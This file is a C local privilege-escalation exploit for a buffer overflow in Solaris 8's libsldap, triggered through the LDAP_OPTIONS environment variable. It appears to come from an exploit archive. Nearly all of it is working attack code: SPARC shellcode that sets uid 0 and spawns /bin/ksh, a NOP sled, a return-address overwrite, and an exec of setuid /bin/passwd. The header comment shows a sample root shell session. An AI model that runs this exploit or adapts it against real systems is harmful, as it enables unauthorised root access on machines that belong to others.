117 lines
No EOL
3.2 KiB
C
117 lines
No EOL
3.2 KiB
C
// source: https://www.securityfocus.com/bid/2931/info
|
|
|
|
Solaris 8 ships with a shared library that implements LDAP functionality called 'libsldap'. This library is linked to by a number of system utilities, many of them installed setuid or setgid.
|
|
|
|
Libsldap contains a buffer overflow vulnerability in it's handling of the 'LDAP_OPTIONS' environment variable.
|
|
|
|
Local attackers can exploit this vulnerability in setuid/setgid programs linked to libsldap to elevate privileges.
|
|
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
#include <string.h>
|
|
|
|
|
|
/* $Id: ldap_exp2.c,v 1.1 2001/06/27 23:01:04 fygrave Exp $
|
|
*
|
|
* victim% ./lod -s 316 -p 5
|
|
* jumping into: ffbefe74 (buf size: 156, soff: 316, stack: ffbefd38)
|
|
* # id
|
|
* uid=0(root) gid=200(em) egid=3(sys)
|
|
* # uname -a
|
|
* SunOS victim 5.8 Generic_108528-06 sun4u sparc SUNW,Ultra-60
|
|
* # ^D
|
|
* victim%
|
|
* Thu Jun 28 05:22:38 ICT 2001
|
|
* Fyodor <fygrave@tigerteam.net>
|
|
*/
|
|
|
|
#define NOP "\x80\x1c\x40\x11"
|
|
#define BUFSIZE 156
|
|
#define LOCALBUF 10000
|
|
#define NOPS 1964
|
|
#define PAD 3
|
|
#define SOFF 664
|
|
|
|
char shellcode[]=
|
|
|
|
"\x90\x1a\x40\x09" /* xor %o1, %o1, %o0 */
|
|
"\x82\x10\x20\x17" /* mov 0x17, %g1 */
|
|
"\x91\xd0\x20\x08" /* ta 8 */
|
|
"\x20\xbf\xff\xff" /* bn,a 0x108b4 <main+8> */
|
|
"\x20\xbf\xff\xff" /* bn,a 0x108b8 <maino> */
|
|
"\x7f\xff\xff\xff" /* call 0x108bc <shellcode> */
|
|
"\x90\x03\xe0\x30" /* add %o7, 0x30, %o0 */
|
|
"\x92\x03\xe0\x28" /* add %o7, 0x28, %o1 */
|
|
"\xc0\x2b\xe0\x38" /* clrb [ %o7 + 0x38 ] */
|
|
"\xd0\x23\xe0\x28" /* st %o0, [ %o7 + 0x28 ] */
|
|
"\xc0\x23\xe0\x2c" /* clr [ %o7 + 0x2c ] */
|
|
"\x82\x10\x20\x0b" /* mov 0xb, %g1 */
|
|
"\x91\xd0\x20\x08" /* ta 8 */
|
|
"\x82\x10\x20\x01" /* mov 1, %g1 */
|
|
"\x91\xd0\x20\x08" /* ta 8 */
|
|
"\x41\x41\x41\x41" /* AAAA */
|
|
"\x41\x41\x41\x41" /* AAAA */
|
|
"\x2f\x62\x69\x6e" /* /bin */
|
|
"\x2f\x6b\x73\x68" /* /ksh */
|
|
"\x41\x57\x68\x6f"; /* junk */
|
|
|
|
extern char *optarg;
|
|
|
|
unsigned long get_sp(void) {
|
|
|
|
__asm__("mov %sp,%i0 \n");
|
|
|
|
}
|
|
|
|
int main(int argc, char **argv) {
|
|
|
|
static char buf[LOCALBUF], *ptr;
|
|
unsigned long addr, bufsize, soff, pad;
|
|
int i, c;
|
|
|
|
soff = SOFF;
|
|
bufsize = BUFSIZE;
|
|
pad = PAD;
|
|
|
|
while((c = getopt(argc, argv, "s:b:p:h")) !=EOF)
|
|
switch(c) {
|
|
case 'b':
|
|
bufsize = strtoul(optarg,NULL,0);
|
|
break;
|
|
case 's':
|
|
soff = strtoul(optarg,NULL,0);
|
|
break;
|
|
case 'p':
|
|
pad = strtoul(optarg,NULL,0);
|
|
break;
|
|
case 'h':
|
|
default:
|
|
fprintf(stderr,"usage: %s [-b buffsize] [-s stackoff] [-p pad]\n",
|
|
argv[0]);
|
|
exit(1);
|
|
}
|
|
|
|
|
|
bzero(buf, sizeof(buf));
|
|
|
|
strcpy(buf,"LDAP_OPTIONS=");
|
|
ptr=buf + strlen(buf);
|
|
|
|
for(i=0;i<bufsize;i++, ptr++) *ptr='A';
|
|
|
|
addr = get_sp() + soff;
|
|
memcpy(ptr,(char *)&addr, 4);
|
|
memcpy(ptr+4,(char *)&addr, 4);
|
|
ptr+=8;
|
|
|
|
for(i=0;i<pad;i++, ptr++) *ptr='A';
|
|
for(i=0;i<NOPS;i++, ptr+=4) memcpy(ptr, NOP, 4);
|
|
strcat(buf, shellcode);
|
|
|
|
putenv(buf);
|
|
fprintf(stderr,"jumping into: %lx (buf size: %i, soff: %i, stack: %lx)\n",
|
|
addr, bufsize, soff, get_sp());
|
|
|
|
execl("/bin/passwd","lameswd",0);
|
|
} |